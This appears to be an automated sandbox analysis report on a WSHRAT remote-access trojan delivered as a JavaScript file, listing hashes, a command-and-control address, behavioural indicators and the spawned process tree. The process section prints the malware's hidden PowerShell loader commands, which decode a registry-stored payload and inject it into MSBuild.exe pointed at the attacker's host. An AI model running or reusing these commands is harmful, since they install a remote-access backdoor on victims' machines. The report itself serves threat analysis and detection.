Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
14/10/2021, 10:12
Static task
static1
Behavioral task
behavioral1
Sample
ID-92164.js
Resource
win7v20210408
0 signatures
0 seconds
General
-
Target
ID-92164.js
-
Size
1.0MB
-
MD5
2e49ab9cb1bcc2aef854c4ea0f4172b9
-
SHA1
9762fe64cdda7ca49f4247d8dd7497e8f6ef295e
-
SHA256
f9490f2e724d5ca5edd30a552f09f27b59b608361143e95edcc3ef860958ea5e
-
SHA512
3dfbbf4b7d3bd3091a3694319e9524baaf05b6db6c212fa73cbaf2df488a4aa104c057839434e7b766b8e2f603b94279d87f5139851516561397dd463c8f458f
Malware Config
Extracted
Family
wshrat
C2
http://3laallah.myvnc.com:5555
Signatures
-
Blocklisted process makes network request 26 IoCs
flow pid Process 11 2416 wscript.exe 13 2416 wscript.exe 23 2416 wscript.exe 24 2416 wscript.exe 25 2416 wscript.exe 32 2416 wscript.exe 34 2416 wscript.exe 35 2416 wscript.exe 36 2416 wscript.exe 39 2416 wscript.exe 40 2416 wscript.exe 41 2416 wscript.exe 42 2416 wscript.exe 43 2416 wscript.exe 44 2416 wscript.exe 45 2416 wscript.exe 46 2416 wscript.exe 47 2416 wscript.exe 48 2416 wscript.exe 49 2416 wscript.exe 50 2416 wscript.exe 51 2416 wscript.exe 52 2416 wscript.exe 53 2416 wscript.exe 54 2416 wscript.exe 55 2416 wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 880 set thread context of 1928 880 powershell.exe 78 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings wscript.exe -
Runs .reg file with regedit 1 IoCs
pid Process 3248 regedit.exe -
Script User-Agent 24 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 25 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 42 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 46 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 51 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 55 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 23 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 34 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 35 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 44 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 45 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 47 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 48 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 50 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 13 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 54 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 39 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 53 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 24 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 40 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 41 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 43 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 49 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 52 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 36 WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 640 powershell.exe 640 powershell.exe 640 powershell.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe 880 powershell.exe 880 powershell.exe 880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 880 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1928 MSBuild.exe 1928 MSBuild.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 2416 wrote to memory of 3248 2416 wscript.exe 70 PID 2416 wrote to memory of 3248 2416 wscript.exe 70 PID 2416 wrote to memory of 640 2416 wscript.exe 72 PID 2416 wrote to memory of 640 2416 wscript.exe 72 PID 2416 wrote to memory of 3964 2416 wscript.exe 74 PID 2416 wrote to memory of 3964 2416 wscript.exe 74 PID 2416 wrote to memory of 880 2416 wscript.exe 76 PID 2416 wrote to memory of 880 2416 wscript.exe 76 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78 PID 880 wrote to memory of 1928 880 powershell.exe 78
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js1⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\regedit.exe"regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"2⤵
- Runs .reg file with regedit
PID:3248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath 3laallah.myvnc.com 5555 "WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands" 13⤵
- Suspicious use of SetWindowsHookEx
PID:1928
-
-